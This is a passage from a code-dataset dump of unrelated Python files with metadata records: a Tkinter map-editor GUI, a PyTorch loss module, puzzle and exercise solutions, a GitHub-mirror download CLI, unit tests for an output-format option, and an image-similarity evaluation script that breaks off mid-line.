self.save_file.pack(side = \"left\", padx = 2, pady = 2)\r\n \r\n self.new_layer = IconButton(self, text = 'create layer', state = 'disabled', command = 
menubar.newLayer)\r\n self.new_layer.set_icon('create layer.png', width = 20, height = 20)\r\n self.new_layer.pack(side = \"left\", padx = 2, pady = 2)\r\n\r\n self.del_layer = IconButton(self, text = 'delete layer', state = 'disabled', command = menubar.delLayer)\r\n self.del_layer.set_icon('del layer.png', width = 20, height = 20)\r\n self.del_layer.pack(side = \"left\", padx = 2, pady = 2)\r\n\r\n Label(self, text = ' ', bg = 'LightCyan').pack(side = LEFT)\r\n\r\n self.pan = IconButton(self, text = 'pan', state = 'disabled', command = menubar.pan)\r\n self.pan.set_icon('pan.png', width = 20, height = 20)\r\n self.pan.pack(side = \"left\", padx = 2, pady = 2)\r\n\r\n self.zoom_in = IconButton(self, text = 'zoom in', state = 'disabled', command = menubar.zoomIn)\r\n self.zoom_in.set_icon('zoom in.png', width = 20, height = 20)\r\n self.zoom_in.pack(side = \"left\", padx = 2, pady = 2)\r\n\r\n self.zoom_out = IconButton(self, text = 'zoom out', state = 'disabled', command = menubar.zoomOut)\r\n self.zoom_out.set_icon('zoom out.png', width = 20, height = 20)\r\n self.zoom_out.pack(side = \"left\", padx = 2, pady = 2)\r\n\r\n self.zoom_to_global = IconButton(self, text = 'zoom to global', state = 'disabled', command = menubar.zoomToGlobal)\r\n self.zoom_to_global.set_icon('zoom to global.png', width = 20, height = 20)\r\n self.zoom_to_global.pack(side = \"left\", padx = 2, pady = 2)\r\n\r\n Label(self, text = ' ', bg = 'LightCyan').pack(side = LEFT)\r\n\r\n self.edit_layer = IconButton(self, text = 'edit layer', state = 'disabled', command = menubar.editLayer)\r\n self.edit_layer.set_icon('edit layer.png', width = 20, height = 20)\r\n self.edit_layer.pack(side = \"left\", padx = 2, pady = 2)\r\n\r\n Label(self, text = ' ', bg = 'LightCyan').pack(side = LEFT)\r\n \r\n self.draw = IconButton(self, text = 'draw', state = 'disabled', command = menubar.draw)\r\n self.draw.set_icon('draw.png', width = 20, height = 20)\r\n self.draw.pack(side = \"left\", padx = 2, pady = 2)\r\n\r\n self.redo = IconButton(self, text = 'redo', state = 'disabled', command = menubar.redo)\r\n self.redo.set_icon('redo.png', width = 20, height = 20)\r\n self.redo.pack(side = \"right\", padx = 2, pady = 2)\r\n \r\n self.undo = IconButton(self, text = 'undo', state = 'disabled', command = menubar.undo)\r\n self.undo.set_icon('undo.png', width = 20, height = 20)\r\n self.undo.pack(side = \"right\", padx = 2, pady = 2)\r\n\r\n self.exit = IconButton(self, text = 'exit', command = menubar.exit)\r\n self.exit.set_icon('exit.png', width = 20, height = 20)\r\n self.exit.pack(side = \"right\", padx = 2, pady = 2)\r\n\r\n self.setFileDisabled(False)\r\n self.setViewDisabled(False)\r\n self.setEditDisabled(False)\r\n self.setDrawDisabled(False)\r\n\r\n def setFileDisabled(self, b):\r\n #不启用按钮\r\n if b:\r\n self.save_file['state'] = 'disabled'\r\n self.new_layer['state'] = 'disabled'\r\n self.del_layer['state'] = 'disabled'\r\n #启用按钮\r\n else:\r\n self.new_layer['state'] = 'normal'\r\n self.del_layer['state'] = 'normal'\r\n self.save_file['state'] = 'normal'\r\n\r\n def setViewDisabled(self, b):\r\n if b:\r\n self.pan['state'] = 'disabled'\r\n self.zoom_in['state'] = 'disabled'\r\n self.zoom_out['state'] = 'disabled'\r\n self.zoom_to_global['state'] = 'disabled'\r\n else:\r\n self.pan['state'] = 'normal'\r\n self.zoom_in['state'] = 'normal'\r\n self.zoom_out['state'] = 'normal'\r\n self.zoom_to_global['state'] = 'normal'\r\n\r\n def setEditDisabled(self, b):\r\n if b:\r\n self.edit_layer['state'] = 'disabled'\r\n else:\r\n 
self.edit_layer['state'] = 'normal'\r\n\r\n def setDrawDisabled(self, b):\r\n if b:\r\n self.draw['state'] = 'disabled'\r\n self.redo['state'] = 'disabled'\r\n self.undo['state'] = 'disabled'\r\n else:\r\n self.draw['state'] = 'normal'\r\n self.redo['state'] = 'normal'\r\n self.undo['state'] = 'normal'\r\n \r\n\r\n\r\nclass MMenu(Menu):\r\n def __init__(self, master, pMap, cv, eye, lFrm, sFrm, mapFile):\r\n Menu.__init__(self, master)\r\n self.pMap = pMap\r\n self.cv = cv\r\n self.eye = eye\r\n self.lFrm = lFrm\r\n self.sFrm = sFrm\r\n self.tFrm = None\r\n self.mapFile = mapFile\r\n fileMenu = Menu(self)\r\n viewMenu = Menu(self)\r\n editMenu = Menu(self)\r\n generalizeMenu = Menu(self)\r\n\r\n fileMenu.add_command(label = '打开', command = self.openFile)\r\n fileMenu.add_command(label = '新建', command = self.newMap)\r\n fileMenu.add_command(label = '保存', command = self.saveFile)\r\n fileMenu.add_command(label = '另存为', command = self.saveFileAs)\r\n fileMenu.add_separator()\r\n fileMenu.add_command(label = '导入', command = self.importLayer)\r\n fileMenu.add_command(label = '导出', command = self.exportLayer)\r\n fileMenu.add_command(label = '导出到数据库', command = self.exportData)\r\n fileMenu.add_command(label = '从数据库读取', command = self.importData)\r\n self.add_cascade(label = '文件', menu = fileMenu)\r\n\r\n viewMenu.add_command(label = '漫游', command = self.pan)\r\n viewMenu.add_command(label = '放大', command = self.zoomIn)\r\n viewMenu.add_command(label = '缩小', command = self.zoomOut)\r\n viewMenu.add_command(label = '缩放至全地图', command = self.zoomToGlobal)\r\n self.add_cascade(label = '视图', menu = viewMenu)\r\n \r\n editMenu.add_command(label = '新建图层', command = self.newLayer)\r\n editMenu.add_command(label = '删除图层', command = self.delLayer)\r\n editMenu.add_command(label = '图层编辑', command = self.editLayer)\r\n self.add_cascade(label = '编辑', menu = editMenu)\r\n\r\n self.add_cascade(label = '数据压缩', menu = generalizeMenu)\r\n generalizeMenu.add_command(label = '线压缩', command = self.lineCompression)\r\n self.master['menu'] = self\r\n\r\n def setTFrm(self, tFrm):\r\n self.tFrm = tFrm\r\n\r\n\r\n def openFile(self):\r\n fName = filedialog.askopenfilename(filetypes = ((\"mpy\", \"*.mpy\"), (\"All files\", \"*.*\")))\r\n\r\n if fName != '':\r\n self.pMap = readData(fName)\r\n self.master.pMap = self.pMap\r\n self.mapFile = fName\r\n\r\n if self.pMap == 'ERRORFILE':\r\n messagebox.showinfo(\"失败\", \"打开文件失败!\")\r\n elif self.pMap == '':\r\n return\r\n else:\r\n self.sFrm.setState(' ')\r\n self.pMap.setCv(self.cv)\r\n self.cv.setMap(self.pMap)\r\n self.pMap.setHawkeye(self.eye) \r\n self.eye.setMap(self.pMap) \r\n self.eye.invalidate() \r\n self.cv['bg'] = 'white'\r\n self.cv.oldMouseState = 'VIEW'\r\n self.lFrm.setMap(self.pMap)\r\n self.cv.invalidate()\r\n self.cv.invalidateLFrm()\r\n\r\n\r\n def newMap(self):\r\n r = WinMapName(self.master)\r\n if r.result == None:\r\n return\r\n\r\n self.pMap = Map(r.result, 0)\r\n self.master.pMap = self.pMap\r\n self.mapFile = ''\r\n \r\n self.sFrm.setState(' ')\r\n self.pMap.setCv(self.cv)\r\n self.cv.setMap(self.pMap)\r\n self.pMap.setHawkeye(self.eye) \r\n self.eye.setMap(self.pMap) \r\n self.eye.invalidate() \r\n self.cv['bg'] = 'white'\r\n self.cv.oldMouseState = 'VIEW'\r\n self.lFrm.setMap(self.pMap)\r\n self.cv.invalidate()\r\n self.cv.invalidateLFrm()\r\n\r\n def saveFile(self):\r\n if self.mapFile != '' and self.pMap != '':\r\n if saveData(self.mapFile, self.pMap):\r\n messagebox.showinfo(\"成功\", \"保存文件成功!\")\r\n else:\r\n messagebox.showinfo(\"失败\", 
\"保存文件失败!\") \r\n\r\n\r\n def saveFileAs(self):\r\n if self.pMap == '':\r\n return\r\n \r\n fName = filedialog.asksaveasfilename(filetypes = ((\"mpy\", \"*.mpy\"), (\"All files\", \"*.*\")))\r\n print(fName)\r\n if fName != '':\r\n if not fName.endswith('.mpy'):\r\n fName += '.mpy'\r\n \r\n if saveData(fName, self.pMap):\r\n messagebox.showinfo(\"成功\", \"保存文件成功!\")\r\n self.mapFile = fName\r\n else:\r\n messagebox.showinfo(\"失败\", \"保存文件失败!\")\r\n\r\n def importData(self):\r\n ##传入存储地图的数据表名称\r\n mapTable = 'map_table'\r\n self.pMap = importDataFromdatabase(mapTable)\r\n self.master.pMap = self.pMap\r\n if self.pMap:\r\n messagebox.showinfo(\"成功\", \"从数据库读取成功!\")\r\n \r\n if self.pMap == '':\r\n messagebox.showinfo(\"失败\", \"数据表文件为空!\")\r\n return\r\n else:\r\n self.sFrm.setState(' ')\r\n self.pMap.setCv(self.cv)\r\n self.cv.setMap(self.pMap)\r\n self.pMap.setHawkeye(self.eye) \r\n self.eye.setMap(self.pMap) \r\n self.eye.invalidate() \r\n self.cv['bg'] = 'white'\r\n self.cv.oldMouseState = 'VIEW'\r\n self.lFrm.setMap(self.pMap)\r\n self.cv.invalidate()\r\n self.cv.invalidateLFrm()\r\n\t\t\r\n def exportData(self):\r\n if self.pMap == '':\r\n return\r\n if exportData2database(self.pMap):\r\n messagebox.showinfo(\"成功\", \"导出文件到数据库成功!\")\r\n\r\n def draw(self):\r\n if self.pMap == '':\r\n return\r\n self.pMap.clearSelectedObjs()\r\n self.cv.hasSelect = False\r\n \r\n if self.cv.mouseMode == 'EDIT':\r\n self.cv.setMouseMode('DRAW')\r\n self.sFrm.setState('图层编辑-绘图')\r\n elif self.cv.mouseMode == 'DRAW':\r\n self.cv.setMouseMode('EDIT')\r\n if messagebox.askyesno(\"保存\", \"是否保存绘制?\"):\r\n self.cv.addObjs2layer()\r\n self.sFrm.setState('图层编辑')\r\n\r\n self.cv.invalidate()\r\n \r\n \r\n def newLayer(self):\r\n if self.pMap == '':\r\n return\r\n\r\n layerConfig = WinCreateLayer(self.master)\r\n if layerConfig.result == None:\r\n return\r\n \r\n if layerConfig.result[0] == '':\r\n layerName = '未命名'\r\n else:\r\n layerName = layerConfig.result[0]\r\n\r\n layer = Layer(layerName, layerConfig.result[1], layerConfig.result[2][-3:], 0)\r\n self.pMap.appendLayer(layer)\r\n self.cv.invalidateLFrm()\r\n\r\n\r\n def delLayer(self):\r\n delfailed = False\r\n \r\n if self.pMap == '':\r\n return\r\n\r\n r = WinDeleteLayer(self.master)\r\n if r.result == None:\r\n return\r\n\r\n layerNo = r.result[0:2].strip()\r\n if layerNo.isdigit():\r\n if self.pMap.delLayer(int(layerNo)-1):\r\n self.cv.invalidate()\r\n self.cv.invalidateLFrm()\r\n delFailed = True\r\n if delFailed == False:\r\n messagebox.showinfo(\"失败\", \"删除图层失败!\")\r\n\r\n\r\n def editLayer(self):\r\n if self.pMap == '':\r\n return\r\n if self.cv.mouseMode != 'EDIT':\r\n if self.cv.mouseMode == 'DRAW':\r\n if len(self.cv.objs) > 0:\r\n if messagebox.askyesno(\"保存\", \"是否保存绘制?\"):\r\n self.cv.addObjs2layer()\r\n else:\r\n r = WinEditLayer(self.master)\r\n if r.result == None:\r\n return\r\n\r\n layerNo = r.result[0:2].strip()\r\n if layerNo.isdigit():\r\n self.cv.setMouseMode('EDIT')\r\n self.pMap.layers[int(layerNo)-1].setEdit(True)\r\n self.cv.setEditLayer(self.pMap.layers[int(layerNo)-1])\r\n self.sFrm.setState('图层编辑')\r\n else:\r\n self.cv.setMouseMode(None)\r\n if self.cv.layerEditing != None:\r\n self.cv.layerEditing.setEdit(False)\r\n self.cv.layerEditing.clearSelectedObjs()\r\n self.cv.hasSelect = False\r\n self.cv.setEditLayer(None)\r\n self.cv.invalidate()\r\n self.sFrm.setState(' ')\r\n\r\n #self.cv.invalidateLFrm()\r\n\r\n\r\n def importLayer(self):\r\n if self.pMap == '':\r\n return\r\n\r\n fName = filedialog.askopenfilename(filetypes = 
((\"lpy\", \"*.lpy\"), (\"All files\", \"*.*\")))\r\n if fName != '': \r\n if importLayerData(fName, self.pMap):\r\n self.cv.invalidate()\r\n self.cv.invalidateLFrm()\r\n else:\r\n messagebox.showinfo(\"失败\", \"导入图层文件失败!\")\r\n\r\n\r\n def exportLayer(self):\r\n if self.pMap == '':\r\n return\r\n if self.pMap.lNum == 0:\r\n messagebox.showinfo(\"错误\", \"当前地图没有图层!\")\r\n return\r\n \r\n r = WinSelectLayer(self.master)\r\n if r.result == None:\r\n return\r\n\r\n fName = filedialog.asksaveasfilename(filetypes = ((\"lpy\", \"*.lpy\"), (\"All files\", \"*.*\")))\r\n if fName != '':\r\n if not fName.endswith('.lpy'):\r\n fName += '.lpy'\r\n \r\n if exportLayerData(fName, r.result):\r\n messagebox.showinfo(\"成功\", \"导出图层文件成功!\")\r\n else:\r\n messagebox.showinfo(\"失败\", \"导出图层文件失败!\")\r\n\r\n def pan(self):\r\n if self.pMap == '':\r\n return\r\n if not self.cv.mouseMode == 'EDIT' and not self.cv.mouseMode == 'DRAW':\r\n self.sFrm.setState('视图')\r\n self.cv.setMouseMode('VIEW')\r\n \r\n\r\n def zoomIn(self):\r\n if self.pMap == '':\r\n return\r\n pt = [0, 0]\r\n pt[0] = (self.cv.curExt[0] + self.cv.curExt[2])*1.0/2\r\n pt[1] = (self.cv.curExt[1] + self.cv.curExt[3])*1.0/2\r\n self.cv.zoom(pt, 1.1)\r\n\r\n def zoomOut(self):\r\n if self.pMap == '':\r\n return\r\n pt = [0, 0]\r\n pt[0] = (self.cv.curExt[0] + self.cv.curExt[2])*1.0/2\r\n pt[1] = (self.cv.curExt[1] + self.cv.curExt[3])*1.0/2\r\n self.cv.zoom(pt, 0.9)\r\n\r\n def zoomToGlobal(self):\r\n if self.pMap == '':\r\n return\r\n for i in range(4):\r\n self.cv.disExt[i] = self.cv.datExt[i]\r\n self.cv.affiCV.calcScale(self.cv.disExt, self.cv.winExt)\r\n self.cv.invalidate()\r\n\r\n def undo(self):\r\n if self.pMap == '':\r\n return\r\n \r\n if self.cv.mouseMode == 'DRAW' and len(self.cv.objs) > 0:\r\n self.cv.tObjs.append(self.cv.objs.pop())\r\n self.cv.obj = Obj(0, 'null')\r\n self.cv.invalidate()\r\n self.cv.drawObjs()\r\n \r\n def redo(self):\r\n if self.pMap == '':\r\n return\r\n \r\n if self.cv.mouseMode == 'DRAW' and len(self.cv.tObjs) > 0:\r\n self.cv.objs.append(self.cv.tObjs.pop())\r\n self.cv.obj = Obj(0, 'null')\r\n self.cv.invalidate()\r\n self.cv.drawObjs()\r\n \r\n def exit(self):\r\n if self.pMap == '':\r\n return\r\n \r\n #从视图状态退出,如果之前状态为编辑或绘制,继续之前状态;否则退出视图状态\r\n if self.cv.mouseMode == 'VIEW':\r\n if self.cv.oldMouseMode == 'EDIT' or self.cv.oldMouseMode == 'DRAW':\r\n self.cv.setMouseMode(self.cv.oldMouseMode)\r\n else:\r\n self.cv.setMouseMode(None)\r\n self.sFrm.setState(' ')\r\n \r\n #从编辑或者绘制状态退出至无状态\r\n elif self.cv.mouseMode == 'EDIT' or self.cv.mouseMode == 'DRAW':\r\n if self.cv.mouseMode == 'DRAW':\r\n if len(self.cv.objs) > 0:\r\n if messagebox.askyesno(\"保存\", \"是否保存绘制?\"):\r\n self.cv.addObjs2layer()\r\n if self.cv.layerEditing != None:\r\n self.cv.layerEditing.setEdit(False)\r\n self.cv.layerEditing.clearSelectedObjs()\r\n self.cv.hasSelect = False\r\n self.cv.setMouseMode(None)\r\n self.cv.setEditLayer(None)\r\n self.cv.invalidate()\r\n self.sFrm.setState(' ')\r\n self.cv.invalidateLFrm()\r\n\r\n def lineCompression(self):\r\n if self.pMap == '':\r\n return\r\n\r\n self.cv.lineCompression()\r\n\r\n \r\nclass SFrm(Frame):\r\n def __init__(self, master):\r\n Frame.__init__(self, bg = 'LightBlue')\r\n \r\n self.clock = Label(self, font=('times', 10, 'bold'), bg='LightBlue')\r\n self.clock.pack(side = RIGHT)\r\n\r\n dateNow = datetime.datetime.now().strftime(\"%Y-%m-%d\")\r\n self.date = Label(self, text = dateNow, font=('times', 10, 'bold'), bg='LightBlue')\r\n self.date.pack(side = RIGHT)\r\n\r\n self.co = 
Label(self, text = '', font=('times', 10), bg='LightBlue')\r\n self.co.pack(side = LEFT)\r\n\r\n Label(self, text = ' ', bg='LightBlue').pack(side = LEFT)\r\n \r\n self.state = Label(self, text = '', font=('times', 8), bg='LightBlue')\r\n self.state.pack(side = LEFT)\r\n \r\n def setState(self, t):\r\n self.state['text'] = t\r\n \r\n def setCo(self, x, y):\r\n coStr = 'x = ' + str(x) + ', y = ' + str(y)\r\n self.co['text'] = coStr\r\n\r\n \r\n \r\n","repo_name":"susurrant/Mappy","sub_path":"GUICom.py","file_name":"GUICom.py","file_ext":"py","file_size_in_byte":21122,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"36055580366","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\n\nclass gradL1(nn.Module):\n def __init__(self, alpha=1):\n super(gradL1, self).__init__()\n\n self.alpha = alpha\n\n def gradient(self,x):\n # x: (b,c,h,w), float32 or float64\n # dx, dy: (b,c,h,w)\n\n h_x = x.size()[-2]\n w_x = x.size()[-1]\n \n left = x\n right = F.pad(x, [0, 1, 0, 0])[:, :, :, 1:]\n top = x\n bottom = F.pad(x, [0, 0, 0, 1])[:, :, 1:, :]\n\n dx, dy = right - left, bottom - top\n \n dx[:, :, :, -1] = 0\n dy[:, :, -1, :] = 0\n\n return dx, dy\n\n def forward(self, sr, hr):\n \n # gradient\n gen_dx, gen_dy = self.gradient(sr)\n gt_dx, gt_dy = self.gradient(hr)\n \n grad_diff_x = torch.abs(gt_dx - gen_dx)\n grad_diff_y = torch.abs(gt_dy - gen_dy)\n\n # average\n return torch.mean(grad_diff_x ** self.alpha + grad_diff_y ** self.alpha)\n\n\n# wrapper of loss functions\nclass Loss(nn.modules.loss._Loss):\n def __init__(self, args):\n super(Loss, self).__init__()\n\n self.loss = []\n self.loss_module = nn.ModuleList()\n for loss in args.loss.split('+'):\n weight, loss_type = loss.split('*')\n if loss_type == 'L1':\n loss_function = nn.L1Loss()\n elif loss_type.find('gradL1') >= 0:\n loss_function = gradL1()\n\n self.loss.append({\n 'type': loss_type,\n 'weight': float(weight),\n 'function': loss_function}\n )\n\n if len(self.loss) > 1:\n self.loss.append({'type': 'Total', 'weight': 0, 'function': None})\n\n for l in self.loss:\n if l['function'] is not None:\n self.loss_module.append(l['function'])\n\n device = torch.device('cuda' if args.cuda else 'cpu')\n self.loss_module.to(device)\n \n if args.cuda:\n self.loss_module = nn.DataParallel(self.loss_module)\n\n def forward(self, sr, hr):\n loss = 0\n losses = {}\n for i, l in enumerate(self.loss):\n if l['function'] is not None:\n _loss = l['function'](sr, hr)\n effective_loss = l['weight'] * _loss\n losses[l['type']] = effective_loss\n loss += effective_loss\n \n return loss, losses\n","repo_name":"hannahhalin/TAIN","sub_path":"loss.py","file_name":"loss.py","file_ext":"py","file_size_in_byte":2404,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"4511373383","text":"import matplotlib.pyplot as plt\nimport networkx as nx\nimport re\n\nfrom collections import Counter, defaultdict\n\n\nwith open(\"input\") as f:\n\ttmp = [line.split(\" -> \") for line in f.readlines()]\n\n\nweights = {}\nG = nx.DiGraph()\nfor line in tmp:\n\tname, weight = line[0].split('(')\n\tweight = int(re.findall(r'\\d+', weight)[0])\n\tname = name.strip()\n\tweights[name] = weight\n\tif len(line) > 1:\n\t\tchildren = [l.strip() for l in line[1].split(',')]\n\t\tfor child in children:\n\t\t\tG.add_edge(name, child, weight=weight)\n\n# part I\nroot = [n for n, d in G.in_degree() if d==0][0]\nprint(root)\n\n# part II\ndef 
weight_subtree(tree, w=0):\n\tif G.degree(tree) == 0:\n\t\treturn w + weights[tree]\n\telse:\n\t\treturn weights[tree] + sum(weight_subtree(t, w) for t in G[tree])\n\ndiff = 0\nwhile True:\n\tweights_tmp = {tree: weight_subtree(tree) for tree in G[root]}\n\tone_out = Counter(weights_tmp.values()).most_common()[-1][0]\n\tnew_diff = max(weights_tmp.values()) - min(weights_tmp.values())\n\tif new_diff == 0:\n\t\tprint(weights[root] - diff)\n\t\tbreak\n\troot = list(weights_tmp.keys())[list(weights_tmp.values()).index(one_out)]\n\tdiff = new_diff\n\t\n\n\n\n\n","repo_name":"madsthoisen/advent_of_code","sub_path":"2017/dec07/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":1114,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"32962260602","text":"#Exercício 02 - Fibonacci\r\n\r\n#Input do número inteiro e criação da lista\r\nnum = int(input(\"Insira um número inteiro: \"))\r\nfibonacci = [0, 1]\r\n\r\n#Enquanto a variável Fibonacci[-1] for menor que a variável num\r\nwhile fibonacci[-1] < num:\r\n#Realiza a adição do valor baseado na variavel e o indice dentro dela (-1 e -2)\r\n fibonacci.append(fibonacci[-1] + fibonacci[-2])\r\n\r\n#Se a variável num estiver em fibonacci, será exibido um print de o número pertence ou não à sequência.\r\nif num in fibonacci:\r\n print(num, \"pertence à sequência de Fibonacci.\")\r\nelse:\r\n print(num, \"não pertence à sequência de Fibonacci.\")","repo_name":"netohost/TargetSistemas","sub_path":"02.Fibonacci.py","file_name":"02.Fibonacci.py","file_ext":"py","file_size_in_byte":639,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"14979586432","text":"\n\nclass Solution:\n def uniquePaths(self, m: int, n: int) -> int:\n row = [1] * n\n print(row)\n for _ in range(m-1):\n newrow = [1] * n\n for j in range(n-2,-1,-1):\n newrow[j] = row[j] + newrow[j+1]\n row = newrow\n print(row)\n return row[0]\n\n\nif __name__ == \"__main__\":\n s = Solution()\n grid_size = (30,12)\n \n print(s.uniquePaths(grid_size[0],grid_size[1]))","repo_name":"thakkarvishal226/Data-structure-and-algorithms","sub_path":"LeetCode 75/62_Unique Paths.py","file_name":"62_Unique Paths.py","file_ext":"py","file_size_in_byte":453,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"407259318","text":"def table(level):\n for j, jt in enumerate(level):\n for i, it in enumerate(jt):\n print(it, end=' ')\n print('')\n\nlevel = \"\"\"\\\n#######\n# #\n# #\n#. # #\n#. $$ #\n#.$$ #\n#.# @#\n#######\"\"\"\n\nlevel = \"\"\"\\\n#######\n# @#\n# #####\n# #\n# # #\n# #$#\n# #.#\n#######\"\"\"\nlevel = level.splitlines()\n\n\nstate = [0]\n\ntable(level)\n\n\n\ndef isWall(d):\n return level[d[0]][d[1]] == \"#\"\n\ndef dirs(atual):\n i, j = atual\n return [(i + 1, j),(i - 1, j),(i, j + 1),(i, j - 1)]\n\ndef neigh(atual):\n ng = []\n for d in dirs(atual[0]):\n if isWall(d): continue\n ng = ng + [d]\n return ng\n\ndef BFS2(state):\n c = []\n v = set()\n p = [state]\n while p:\n atual = p.pop()\n if atual in v: continue\n for prox in neigh(atual):\n p = [prox] + p\n v.add(atual)\n c = c + [atual[0]]\n return c\n\n\nstate = [0]\nfor i, line in enumerate(level):\n for j, ch in enumerate(line):\n if ch == \"@\": state[0] = (i, j)\n\nprint (BFS2(state))\n\ntable(level)\n\n\n\n\n'''\n ####\n ##. ##\n##### . 
#\n# #  # #\n# $ #  #  #\n#  $ @    #\n######  ##\n     ####\n\n\nSolution:\nlluullddRRRRuruurrdddldlUUUUdddllluulDldRRRRuruurrdddldlUUU\n\n\nhttp://www.sokobano.de/wiki/index.php?title=Optimizer\n\n'''","repo_name":"elsioantunes/cloud9","sub_path":"(Paralela)/sokoban/sokoban0c.py","file_name":"sokoban0c.py","file_ext":"py","file_size_in_byte":1260,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21535474160","text":"# 아래 코드는 문자열에서 모음의 개수를 찾는 코드입니다. \n# 코드에서 오류를 찾아 원인을 적고, 수정하세요.\n\n# word = \"HappyHacking\"\n\n# count = 0\n\n# for char in word:\n#     if char == \"a\" or \"e\" or \"i\" or \"o\" or \"u\":\n#         count += 1\n\n# print(count)\n\n\nword = ('HappyHaksick')\n\ncount = 0\n\nfor char in word:\n    if char in 'aeiou':\n        count = count + 1\n\nprint(count)\n\n# 14일 수업때 말씀하셧던 위의 예제는 a만 출력하게 되므로 수정하였습니다.\n# 예제와 같이 하려면 char == 'a', char == 'e' 이런식으로 풀어줘야 합니다!","repo_name":"1c0332zz/TIL","sub_path":"python/실습 풀이/예제/08.예제 [오류] 모음의 개수 찾기.py","file_name":"08.예제 [오류] 모음의 개수 찾기.py","file_ext":"py","file_size_in_byte":609,"program_lang":"python","lang":"ko","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"25937860906","text":"#!/usr/bin/python\nimport typer\nimport subprocess # 导入子模块\n#from download import download\n#import wget\nfrom Cit import cit_url\nimport requests\nfrom tqdm.auto import tqdm\n#from .main import app\n\n\nCONTEXT_SETTINGS = dict(help_option_names=[\"-h\", \"--help\"])\n\n\n\n#app = typer.Typer(add_completion=False)\napp = typer.Typer(help=\"从github的下载速度提高一万倍\",add_completion=False)\n\ndef main(\n    name: str = typer.Argument(\n        \"Wade Wilson\", help=\"Who to greet\", show_default=\"Deadpoolio the amazing's name\"\n    )\n):\n    typer.echo(f\"Hello {name}\")\n\n\n#@app.command()\ndef 地址序号():\n    try :\n        num = int(input('请输入一个数字(默认为0):') )\n    except ValueError :\n        num = 0\n    return num\n\n@app.command()\ndef change(url:str):\n    \"\"\" \n    链接转换:cit change \n    \"\"\"\n    s = cit_url.main(url)\n    \n    \n\n\n@app.command()\ndef clone(url:str ):\n    \"\"\"\n    git加速:cit clone \n    \"\"\"\n\n    \n    最终地址 = cit_url.main(url)\n    git_start = subprocess.call(['git', 'clone',最终地址]) \n    \n\n@app.command()\ndef sub(url:str):\n    \"\"\"\n    子模块加速:cit sub \n    \"\"\"\n    最终地址 = cit_url.main(url) \n    git_start = subprocess.call(['git', 'submodule','add', 最终地址]) \n\n@app.command()\ndef get(url:str):\n    \"\"\" \n    文件下载:cit get \n    \"\"\"\n    \n    下载地址 = cit_url.main(url)\n    print(f'下载地址是:{下载地址}')\n    file_name = 下载地址.split('/')[-1]\n    typer.echo(f\"开始下载文件:{file_name}\")\n    r = requests.get(下载地址,stream=True)\n    with tqdm.wrapattr(open(file_name, \"wb\"), \"write\", miniters=1,\n                    total=int(r.headers.get('content-length', 0)),\n                    desc=file_name) as fout:\n        for chunk in r.iter_content(chunk_size=4096):\n            fout.write(chunk)\n\n\"\"\" if __name__ == \"__main__\":\n    app() \"\"\"\n\n\n\n\n    \n    #typer.echo(f'正在执行下载命令:{下载命令}') \n\n\"\"\" @app.command()\ndef hello(name: str):\n    typer.echo(f\"Hello {name}\")\n\n\n@app.command()\ndef goodbye(name: str, formal: bool = False):\n    if formal:\n        typer.echo(f\"Goodbye Ms. {name}. 
Have a good day.\")\n else:\n typer.echo(f\"Bye {name}!\") \"\"\"\n\n\n","repo_name":"solider245/cit","sub_path":"Cit/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2202,"program_lang":"python","lang":"en","doc_type":"code","stars":35,"dataset":"github-code","pt":"53"} +{"seq_id":"34381171146","text":"from unittest import TestCase\nfrom unittest.mock import Mock, patch\n\nfrom cibyl.cli.main import OutputStyle, raw_parsing\nfrom cibyl.exceptions.cli import InvalidArgument\n\n\nclass TestRawParsing(TestCase):\n \"\"\"Tests for the -f CLI option.\n \"\"\"\n\n def test_default_output(self):\n \"\"\"Checks the default value for the option.\n \"\"\"\n args = raw_parsing([])\n\n self.assertTrue(OutputStyle.COLORIZED, args['output_style'])\n\n @patch('cibyl.cli.main.OutputStyle.from_key')\n def test_f_arg(self, parse_call: Mock):\n \"\"\"Checks that user's input is read.\n \"\"\"\n style = 'raw'\n\n parse_call.return_value = OutputStyle.TEXT\n\n args = raw_parsing(['', '-f', style])\n\n self.assertTrue(OutputStyle.TEXT, args['output_style'])\n\n parse_call.assert_called_once_with(style)\n\n @patch('cibyl.cli.main.OutputStyle.from_key')\n def test_output_arg(self, parse_call: Mock):\n \"\"\"Checks that --output-format also works.\n \"\"\"\n output = 'raw'\n\n parse_call.return_value = OutputStyle.TEXT\n\n args = raw_parsing(['', '--output-format', output])\n\n self.assertTrue(OutputStyle.TEXT, args['output_style'])\n\n parse_call.assert_called_once_with(output)\n\n @patch('cibyl.cli.main.OutputStyle.from_key')\n def test_invalid_output_arg(self, parse_call: Mock):\n \"\"\"Checks reaction to unknown style.\n \"\"\"\n\n def raise_error(_):\n raise NotImplementedError\n\n output = 'invalid'\n\n parse_call.side_effect = raise_error\n\n with self.assertRaises(InvalidArgument):\n raw_parsing(['', '--output-format', output])\n\n parse_call.assert_called_once_with(output)\n","repo_name":"RedHatCRE/cibyl","sub_path":"tests/cibyl/unit/cli/test_main.py","file_name":"test_main.py","file_ext":"py","file_size_in_byte":1719,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"53"} +{"seq_id":"15868201093","text":"import sys, os\nfrom PIL import Image\nimport numpy as np\nfrom skimage.measure import compare_ssim as ssim\n\ndef RootMeanSquareDeviation(image_out, image_ref):\n\tassert image_out.shape == image_ref.shape, \"Eval error: Image Size mismatch\"\n\treturn np.linalg.norm(image_out - image_ref)/(255.0*(image_ref.size**0.5))\n\ndef StructuralSimilarityIndex(image_out, image_ref):\n\tassert image_out.shape == image_ref.shape, \"Eval error: Image Size mismatch\"\n\treturn ssim(image_out, image_ref, multichannel=True)\n\nroot_dir = sys.argv[1]\nssim_list = []\nrmsd_list = []\nfor idx in range(len(os.listdir(root_dir+'/target/'))):\n\timg1 = 